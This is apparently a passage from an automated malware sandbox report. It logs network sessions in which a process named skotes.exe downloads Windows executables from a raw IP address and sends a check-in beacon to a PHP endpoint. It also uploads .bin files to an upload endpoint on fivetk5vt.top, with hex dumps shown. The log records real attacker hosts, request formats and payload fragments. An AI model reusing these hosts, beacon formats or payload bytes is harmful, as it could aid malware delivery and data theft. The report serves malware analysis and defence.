8e 39 b6 22 3f 6b 3a 37 12 ef 60 55 f4 1a cc 38 fb dd 80 38 fa a3 68 06 af 90 e0 97 67 db 4b a4 b0 68 0f a7 98 44 08 24 b3 0a f4 80 b7 27 ce 81 47 a7 77 83 2d 9a b1 1d 27 dc b0 3a ef ac 81 03 cd 66 9e b1 68 37 65 64 bf fb e3 0c e2 40 31 29 4b 5f 3c 6f d7 6c 78 d0 7b 80 e6 f4 56 02 6e 86 c2 e7 63 60 62 28 03 30 28 9c 01 1e f7 e1 c7 c8 36 f4 85 d8 e1 c7 34 cc d2 [TRUNCATED] Data Ascii: --------------------------8ORzNntBtFTcs2Ev6GtoTyContent-Disposition: form-data; name="file"; filename="Huwema.bin"Content-Type: application/octet-streamgN#jG2S[]$ ;r=y~9"?k:7`U88hgKhD$'Gw-':fh7ed@1)K_<olx{Vnc`b(0(64HaOspCm~QB-^~cNYQ:Kx\d}K[wo8/a4--------------------------8ORzNntBtFTcs2Ev6GtoTy--
Dec 19, 2024 10:12:00.785881042 CET	255	IN	HTTP/1.1 200 OK server: nginx date: Thu, 19 Dec 2024 09:12:00 GMT content-type: text/plain; charset=utf-8 content-length: 2 x-ratelimit-limit: 30 x-ratelimit-remaining: 29 x-ratelimit-reset: 1734601321 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	50147	31.41.244.11	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:59.972203970 CET	61	OUT	GET /files/london/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 19, 2024 10:12:01.294193029 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:01 GMT Content-Type: application/octet-stream Content-Length: 1885696 Last-Modified: Wed, 18 Dec 2024 18:20:46 GMT Connection: keep-alive ETag: "6763127e-1cc600" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 80 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 4a 00 00 04 00 00 25 2d 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gJ@J%-@T0h 1 H@.rsrc X@.idata 0Z@ *@\@uzxdwyviP 0B^@efzdldigpJ@.taggant0J"@
Dec 19, 2024 10:12:01.294374943 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:01.294606924 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:01.295200109 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:01.295236111 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:01.296518087 CET	672	IN	Data Raw: 82 d1 3c 6b f2 a9 3f 64 c4 7d 12 98 22 98 9d a8 1d f9 f0 7a 81 69 65 64 d7 32 b9 b9 68 17 b7 57 43 24 e5 c0 ca 5c 96 de 59 58 1c f0 8e 4d cb c6 81 3b 48 a1 45 bf d5 e0 0e 27 90 8d ce a0 74 9c a4 33 aa 50 44 ef 33 33 c4 66 c7 dc ff f1 b3 aa a6 c7 Data Ascii: <k?d}"zied2hWC$\YXM;HE't3PD33fHM"RP_W&"!E^;vV&/y6{`}O.s?@&28d=j@yd-tm>7r9MM\| tt&1v^!f.&b@kM?[@R
Dec 19, 2024 10:12:01.296552896 CET	1236	IN	Data Raw: a9 6e bf c6 57 cd fd 16 18 29 60 71 e6 87 fe ae 0a 31 f6 7d bc 5a 34 58 b1 d5 e9 11 4b 53 d2 95 01 f1 14 ad 65 79 e2 bc c4 4e ba f6 41 41 c3 dc 33 cd cd 28 81 2d fc ba c5 e5 5e 94 3e 4d ed 7b 9d 42 c2 40 3c 69 e9 b9 91 78 94 ca 8a 45 01 8a 02 d9 Data Ascii: nW)`q1}Z4XKSeyNAA3(-^>M{B@<ixEq9{X64mk%aa-r(Ml':-.AC5`2B[VAd!^iynugK6`tst~\|G61Y5&:`c_}Kz{;\
Dec 19, 2024 10:12:01.297806025 CET	1236	IN	Data Raw: 4f 19 68 44 7e 28 a0 ee 57 21 15 65 5c 65 42 40 68 e8 83 b3 12 68 f5 10 f8 ea 58 71 80 76 79 7c 34 49 b2 f8 50 5e e0 72 38 3a 7d 45 49 9e fe 43 c6 54 9d fb db d1 e5 e1 9c ce f7 da 5e 43 e6 6b ca 0d 58 80 fe eb c8 43 4d 32 41 d1 57 08 ec 89 41 4e Data Ascii: OhD~(W!e\eB@hhXqvy\|4IP^r8:}EICT^CkXCM2AWAN voqpgx8u<~LS>pw_ &wD?ve?JUl^1c'"[w8+QU,CS;TYu=}e6`yaIu>Xyu1?Ft
Dec 19, 2024 10:12:01.297859907 CET	1236	IN	Data Raw: 04 d7 74 18 f1 0a 3e 0a 18 15 ea c2 dd 5c f9 c3 01 4d 06 9a fd 3e be 0b 87 a5 7a e1 d9 0e ee c5 c0 cf 91 c8 fb 2e 22 59 f2 18 91 00 37 7b d0 5e a8 f4 b0 ff e8 7b 39 d3 dc b7 0c 99 b9 ce e1 ee 3d c6 f9 94 fc 14 9f d6 14 0b 4b 4f 15 01 78 5b d1 d1 Data Ascii: t>\M>z."Y7{^{9=KOx[X{QIsyIj<g3MN:Dle@ay}&y.=ht}e@\|MseCfC#ryD)D~bY/s0:yA@0[ODs+^
Dec 19, 2024 10:12:01.297894955 CET	1236	IN	Data Raw: 7f 85 e1 4b b6 a1 f6 11 7a 63 5f a3 6d f8 71 c9 e8 81 ae 59 99 11 f4 8d 0b 05 e4 de 66 7e 37 a5 b6 1e cd 88 1d e0 7e aa 3e 48 6e 8f 45 17 1f 80 63 f0 fa 89 69 b9 7d e9 2b f5 e7 c4 bc a5 86 47 c4 0d 4c 51 bb 6d 6d 97 0e 23 37 b7 21 52 78 28 07 53 Data Ascii: Kzc_mqYf~7~>HnEci}+GLQmm#7!Rx(S&(-^/C8xXfPq7vK{J{lV\-AmA9a3E~UM6n-uJ&8:E-OJ>&=dAWiObAXO6{0y}g&\|L}\h[yF4.,Ut
Dec 19, 2024 10:12:01.413849115 CET	1236	IN	Data Raw: bf 2d ba 41 f7 1f b5 2f 6c fb 3b 02 bb 67 17 1b 8c 47 30 99 fe a6 4b b5 7e f7 45 6e 6e 78 83 47 0f 15 b6 90 75 d8 a4 cd c4 a3 b1 c9 88 88 67 93 b9 dc b3 8f 8c 47 fe fe da ff f9 8d a4 3e b2 66 6b 64 4b e9 99 2d a3 4c 7f 2c 66 1d ea 5e 52 af b7 55 Data Ascii: -A/l;gG0K~EnnxGugG>fkdK-L,f^RUBQRj*?L)a=-FVqN{r[jGmb0\|u1aB/~~HgbN7[luAhbO7L$]5&;;C%aqCM

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.6	50151	176.53.146.212	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:02.155318975 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: fivetk5vt.top Accept: / Content-Length: 58860 Content-Type: multipart/form-data; boundary=------------------------D9pB4dIt8GxtVDtc4I4jGL Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 44 39 70 42 34 64 49 74 38 47 78 74 56 44 74 63 34 49 34 6a 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 75 66 65 6a 65 6a 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a dd a2 06 9e 58 b3 38 9c ea bc db 2a 1c 48 6b a5 1a 1c f0 99 61 8a 9d 0d 58 96 1f 36 03 5c 54 da 3b 14 0d 7a ac c7 5c ef ba 84 c3 46 e2 92 01 71 22 e6 aa 73 8b b2 13 d5 23 68 58 26 a5 22 82 45 77 47 8b 32 f2 f2 88 1c 7e ee ac 4f 84 e2 2b 08 17 a6 b8 c2 a4 05 c6 73 55 58 47 02 86 a5 ab d3 51 08 2c 1f 36 cd 9f 70 3d ca 53 2f 66 b7 56 09 3a cf cf 67 5a 6d 8d 29 43 e0 08 9a ff 03 f6 65 c4 9e 32 c7 0b e5 00 65 62 6a fc d7 06 3f 79 7d 85 dd 1e 32 ae a5 ba 6f 6b ad 54 73 5c 6f ad 22 79 99 c7 84 7a 6f 34 f5 07 4b 35 32 a3 2f 1c 04 [TRUNCATED] Data Ascii: --------------------------D9pB4dIt8GxtVDtc4I4jGLContent-Disposition: form-data; name="file"; filename="Qufejeji.bin"Content-Type: application/octet-streamX8HkaX6\T;z\Fq"s#hX&"EwG2~O+sUXGQ,6p=S/fV:gZm)Ce2ebj?y}2okTs\o"yzo4K52/]t(?l6EV{VasayA<'FX!z9eNO`fgO~8V^}))+Igk@5=5eDTe-OC`Exo;8x,i\=I,{Vv(%fCkQT#uBef7G#h`AP9\|nL%![m!Re/&Ev\|X;7toJKfotsKoHt#=u71Ie\|$^htlt(a3h2acL}3^^W!'8]tE;ItV[R's+)\|~xkKdCRv?WV;`>mSeKMXDI;A+."vS@&0c#58eaB\|\|/9iCSM0q>S-]S)tB4fE4d5Tyr(eTLL'MH*x./9a0#`QmeS1H# [TRUNCATED]
Dec 19, 2024 10:12:02.275002956 CET	4944	OUT	Data Raw: 52 79 f5 f9 1b b7 29 61 ae 93 db b2 81 ac 43 f0 08 2c f1 58 3e 56 24 83 9f 1c 77 9f 9d 5f 04 d3 2a be ec b6 5e 23 e8 e1 a5 e5 2d 0e bb 76 9c 59 96 7e 9a 32 85 4b 96 d8 3a 81 39 74 2b 1b 21 72 3e c9 cd b5 24 74 70 52 1f 3d 97 33 a4 67 f3 6e 19 b3 Data Ascii: Ry)aC,X>V$w_^#-vY~2K:9t+!r>$tpR=3gn;;h:FC`3'WfUI_&A^GJCf`/,_E>S1bIocn`CHD/Lnl7."QK@p_d%I\]?kq6}+@Bwd'/
Dec 19, 2024 10:12:02.275049925 CET	2472	OUT	Data Raw: 56 b7 3d f4 ee f5 2f ff 80 f9 0e 51 7a 11 7e fc 04 c7 d6 5f 5d 98 ac eb 62 29 95 73 ac 70 7c 9f 26 14 8a e6 7f b5 9a 04 7e 1d c7 00 46 f6 ce 8e 42 8e 5e 77 e1 e9 ff 7c b1 35 c9 6d 3e 31 9f c9 61 c9 dd f6 15 de 58 dd 62 2d 91 b1 82 fd 37 1c ae 96 Data Ascii: V=/Qz~_]b)sp\|&~FB^w\|5m>1aXb-7lndZFNI{/sL>g[kRd6:T5!r!0cd&}`iOJgmn5YHHFKxc$Y`{6<0\|~d,rp
Dec 19, 2024 10:12:02.275139093 CET	2472	OUT	Data Raw: b6 a6 a8 1e 9c 66 25 c3 a6 c8 bc 0d ae 36 43 1d 77 82 13 54 25 eb 9d ec 61 a5 f6 af 4c 0a 05 f3 73 68 ff 0d f3 87 b5 74 5e 67 4e 6c 38 43 3b 5c 3c 0f 30 ee 34 ad 18 7f a9 5e 52 9a ca 94 d3 a7 54 ea 60 3d 9f 51 dc 17 a4 70 b5 ff b1 fe 3d e4 67 ab Data Ascii: f%6CwT%aLsht^gNl8C;\<04^RT`=Qp=gXbB')_VLs?4Q}_:DqF2D)TWNO>/*vzq@f ]U->?F~\|=:M$h%H>Qa-C?9hmlc
Dec 19, 2024 10:12:02.275224924 CET	2472	OUT	Data Raw: 7f ca 57 cc a6 a8 1f 4e 71 92 0c 95 56 7b 35 82 82 23 da b7 6c da 17 76 06 64 5a 62 d6 6b 8b 97 06 80 6c 97 89 54 21 68 68 08 b1 72 48 07 8b 05 98 56 e3 41 9b f5 41 b8 42 70 1d 47 21 46 ad 67 2f 68 39 57 3f 30 f2 47 b5 06 aa 7d bb d8 31 ec b6 f2 Data Ascii: WNqV{5#lvdZbklT!hhrHVAABpG!Fg/h9W?0G}1'+FFjibW6P\|]$LiKJr_sopYYI3:9JW6JLkGadlxIz\|r"!pte~iva~1~s$QE)3)Nc_`
Dec 19, 2024 10:12:02.275912046 CET	9888	OUT	Data Raw: 75 d3 20 2a 5c 9d a6 e7 27 bd c4 8b 0d 05 da 58 ac a6 ed 60 ee 5d bb f1 6b 46 6a ac bf 08 ab 32 d8 6a f3 f1 f3 36 87 44 9a 78 40 60 93 4b 0d 28 17 f5 3c ac 68 ee 22 6e c3 42 2b dc 12 05 56 1f 91 ce c0 71 8e 23 d2 fc 24 a3 1f 00 cb ea ac f6 3d c7 Data Ascii: u *\'X`]kFj2j6Dx@`K(<h"nB+Vq#$=W[@~"4!g-ipdW1tJt0=:4Xh{bs 1~7;l25\|\B)!}%"ZF84GlvA:
Dec 19, 2024 10:12:02.277183056 CET	2472	OUT	Data Raw: a8 5f 3e 3f c2 71 17 d4 9f 3c df 90 9a 13 93 bc 80 d6 c2 b9 8d f3 71 77 28 a7 6d 0f 4f 8f a0 04 1b 58 d7 45 5f 24 17 22 c4 81 db ec a6 9d 20 fe e7 d4 fd 6b c8 de f0 a6 62 a2 d3 5d d3 5d 8d cc 4d ab d4 60 b5 85 7e f7 36 a2 ce a1 db 6d 7b 38 72 37 Data Ascii: _>?q<qw(mOXE_$" kb]]M`~6m{8r7nysSA?cZ1.4MlIOP=AV"vRKw(o7},'Qcwnqv(c9=j6-}A$m%IuEA\M^VPq^Lh;Tn\Yx*\
Dec 19, 2024 10:12:02.394726992 CET	2472	OUT	Data Raw: 3e c1 ff f4 a4 57 5d bd 37 70 b4 24 78 b7 09 a3 ea 64 b2 47 01 3c 1b fe 99 9c 84 06 9c f1 ea ae f0 db 17 1a ab 52 11 a2 54 a0 0b 32 dc 4d f4 5e 1b 47 89 42 e7 5f 9f 93 42 9c b6 de df 46 44 0f 45 31 39 0f ff 51 6a 64 26 2d b9 76 31 73 f0 c8 45 8d Data Ascii: >W]7p$xdG<RT2M^GB_BFDE19Qjd&-v1sER)>5u1.)ylYq!+hE+[yCwf>)!puH1g`<,Yrz?l;PJOj#Z'&]s8ypCez<GY
Dec 19, 2024 10:12:02.395153046 CET	12360	OUT	Data Raw: 20 0e b3 8b 97 5a 43 64 34 d2 b1 98 9b ee e2 17 42 9e 90 16 cc 38 3f 15 70 eb c8 f7 b3 5b 9b a0 8e 0f b0 27 8c f9 d1 f3 92 8c 09 f2 8b 48 aa f5 e5 a8 2f 06 8e a5 29 1a 7b f5 2a 76 28 36 83 13 04 a4 dd 3b a6 af 26 7e ed 40 94 9a cb 27 a6 87 cb 07 Data Ascii: ZCd4B8?p['H/){v(6;&~@'B=9T^`:<edlP>>`F0}s~pqgzLsk@@[d2?"ra;<@riVG!VO=)$c<CX)L]w&\]D2Zl??~
Dec 19, 2024 10:12:02.435709953 CET	2472	OUT	Data Raw: af 76 1d c0 47 d3 4e 11 60 42 22 82 3f d8 04 29 27 bf ff e2 73 f2 a6 2d 11 9f 17 5c 0c 29 6a 36 97 a6 db 2f 5f a1 40 a8 40 f8 66 6a 2b f8 64 e0 18 1d f2 98 46 7c 5f a0 c9 ed b2 34 d7 aa 1f f4 8d 46 3b a5 2a 22 a3 dc 0b 3e 40 28 74 f8 88 0d 8e 8a Data Ascii: vGN`B"?)'s-\)j6/_@@fj+dF\|_4F;">@(t@4KG ' ucrvJ5@_(B3h#{#80MnrD32DFl_${D6b=nhpm&?BCz}`}Ks&
Dec 19, 2024 10:12:02.435744047 CET	4657	OUT	Data Raw: 5e 27 4c 21 f9 06 2c 04 c5 c9 df 3c 8b c7 97 ec 96 05 65 b7 b7 d8 28 86 68 56 d8 e3 cf 04 fa a6 56 c8 fc 3c 56 97 f4 19 ab d1 70 36 5c de 27 18 52 9b 53 43 32 18 87 cc ba 10 46 b7 11 1b 76 0f 30 60 48 15 a2 e1 4a 93 fe 4c fd cb 0f 2c 4c 8a 23 4d Data Ascii: ^'L!,<e(hVV<Vp6\'RSC2Fv0`HJL,L#MV9VA{&CwBn6kq-e(Sp<=>{%]q-%!Fb&FYDb_^T~EnPk.0.Yu:{N/-4>gbqg
Dec 19, 2024 10:12:03.918853998 CET	255	IN	HTTP/1.1 200 OK server: nginx date: Thu, 19 Dec 2024 09:12:03 GMT content-type: text/plain; charset=utf-8 content-length: 2 x-ratelimit-limit: 30 x-ratelimit-remaining: 28 x-ratelimit-reset: 1734601321 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	50162	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:06.928297043 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 38 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017489001&unit=246122658369
Dec 19, 2024 10:12:08.282265902 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	50171	31.41.244.11	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:08.412741899 CET	62	OUT	GET /files/unique1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 19, 2024 10:12:09.742132902 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:09 GMT Content-Type: application/octet-stream Content-Length: 4489216 Last-Modified: Thu, 19 Dec 2024 08:05:35 GMT Connection: keep-alive ETag: "6763d3cf-448000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e0 55 60 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 3e 44 00 00 2e 64 00 00 32 00 00 00 c0 b6 00 00 10 00 00 00 50 44 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 b6 00 00 04 00 00 db 60 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 61 00 73 00 00 00 00 80 61 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c a1 b6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc a0 b6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELU`g(>D.d2PD@`E@ _asa pa>(@.rsrcaN(@.idata aP(@ 9aR(@dbfylxjsT(@wkvrxmnjXD@.taggant0"^D@
Dec 19, 2024 10:12:09.742249966 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:09.742290020 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:09.743155003 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:09.743191004 CET	896	IN	Data Raw: 0f 17 3b 47 1b e0 80 b6 a6 e8 bb 6c 95 28 0b 17 f3 7e 65 2b f3 f2 c6 b4 c4 a8 9a e2 83 ab f1 3e ce f7 61 2f a1 8e 92 ff ac 86 55 ea af 9e 52 47 f8 9c bf 3e 15 a1 81 b4 72 2c 46 b5 c6 ee 45 c0 ee 4d 43 ac 3e 8b 96 dd cb 66 df f7 3c e9 f7 b4 ea 97 Data Ascii: ;Gl(~e+>a/URG>r,FEMC>f<S0BC4w7l~u@YOTvP}%xa ]8zb* jkc8c+mUAmr\|U\|y}m&p<%xqlI!~
Dec 19, 2024 10:12:09.744255066 CET	1236	IN	Data Raw: e4 80 41 86 f5 9d 67 a8 e0 f9 09 23 4a 10 52 97 1c cf f8 03 8a 4d 00 bf 36 46 02 6b 0f ab 9d d6 2e 75 a5 8d 1d 66 26 9b e2 83 37 c6 72 77 79 d1 9a f7 96 6e 24 89 d9 54 35 87 c8 77 37 d5 17 93 88 7d fd c0 28 c9 d1 bb 66 a9 8d e5 5a a8 f6 28 c2 fe Data Ascii: Ag#JRM6Fk.uf&7rwyn$T5w7}(fZ(I^ZFpfi_5}c\|4kX;_Ee6';l57N8'4G^~%B9cW5ERHR&u6K1!@\|5Z-67b"e
Dec 19, 2024 10:12:09.744297981 CET	1236	IN	Data Raw: 1a f6 7d 6b c3 6a be 75 8b fc 0f 6e 9e 47 91 af 39 6c d6 dd a9 66 af 43 a4 87 b1 f5 a1 bc 48 4a b3 a9 fd 9a 87 51 19 bc ab 29 83 77 02 79 96 7f bc d4 c8 49 69 2e 08 9a 54 a8 47 70 e4 03 0d 68 ef 21 97 73 56 e7 23 40 18 cd f4 21 2a 95 ae c3 8d ee Data Ascii: }kjunG9lfCHJQ)wyIi.TGph!sV#@!*85zTsH8 .sCOjXR7XxsF#AQt+E#l:3/at8qiUcy//F3=T--sSF{B4b9zq
Dec 19, 2024 10:12:09.744333982 CET	448	IN	Data Raw: e6 f5 20 0b 4e aa 8b cd d7 cc b9 c5 4a 63 e2 15 cf 66 10 f8 28 c2 25 36 db c9 e8 5a d7 75 85 55 72 9f ce 09 0c bd ec 63 34 38 db 60 0c ed 8a 0f c7 b9 23 1b 23 97 96 42 54 2a b8 c4 da 82 15 20 df 09 75 37 cc ca 09 c8 7d 8e 48 75 de ac b7 a8 39 ab Data Ascii: NJcf(%6ZuUrc48`##BT* u7}Hu9#FCsjk1IHY~zZ9-^s$v9s!c*rfzM`h}'Uq"%meNLgv/olExq6ky?dkbN9EfD(
Dec 19, 2024 10:12:09.745250940 CET	1236	IN	Data Raw: 65 34 ea d4 34 07 0e 97 95 ab 1c db 36 fd 8e eb 4a 86 85 34 56 07 b4 4f d3 98 e9 fb a3 c5 5e 86 41 76 c9 67 cb 85 35 ff 92 30 9a a5 d8 86 b4 c0 99 37 8f a4 5b b1 03 ae 2d 00 74 d0 26 68 08 3b 36 22 3e 48 0b 1b a3 ff 1f 2c 1b 40 d8 0e d1 bf 0a 44 Data Ascii: e446J4VO^Avg507[-t&h;6">H,@Dw)fwMCWcT-}(gsjOX az jhbD7wCxtlxxwJ#EMW/gFLe?2;"
Dec 19, 2024 10:12:09.745289087 CET	1236	IN	Data Raw: 61 22 08 f3 90 b9 3e 28 93 4a 2a 3b 93 89 7a 45 79 69 6c f6 84 77 15 a2 10 eb 35 50 b2 88 69 b9 ed cf 81 a7 1a 8f 16 02 bb 98 2b db de b0 55 22 a7 93 31 c4 fc e6 ed ae 8b c0 b3 f7 88 fe 61 18 ed 28 0b eb 6e b1 23 db 3f 80 96 17 c3 21 34 b9 b0 64 Data Ascii: a">(J;zEyilw5Pi+U"1a(n#?!4dcPx%jE?~0sA):E7k93~,.rQ);%UlTnz6)nl<E}>mmBP6v>\|)Is(
Dec 19, 2024 10:12:09.862131119 CET	1236	IN	Data Raw: ce 9a 19 d3 bf f9 11 46 da 9a 58 f1 b3 20 7a d4 d9 cf 9e 5e 77 75 46 7c 9b ef 2a e0 8d 1d 2d f7 47 5a f2 ac d4 39 03 e4 a3 1d 71 fa 43 20 ca e2 16 45 98 0f be 5d de cd 6f ea 86 4e c7 21 1e 48 52 02 ff e3 6f 06 e2 11 03 20 4e 6f df f6 b5 64 f3 e7 Data Ascii: FX z^wuF\|-GZ9qC E]oN!HRo Nod@>MlC&r#7BvY18A?vM"nF*O4e}5@4Q<]/i7k_i<F+9k7)&1kGkj4f/(

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.6	50176	176.53.146.212	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:10.071206093 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: fivetk5vt.top Accept: / Content-Length: 28693 Content-Type: multipart/form-data; boundary=------------------------nRrMw9JTgeiHEQRbV11EgG Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6e 52 72 4d 77 39 4a 54 67 65 69 48 45 51 52 62 56 31 31 45 67 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 61 6c 69 77 65 67 65 6a 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 78 87 17 37 f7 7f 5b d9 7e 06 22 b6 4c 3a 74 87 97 2e e7 96 a7 b5 fd d6 11 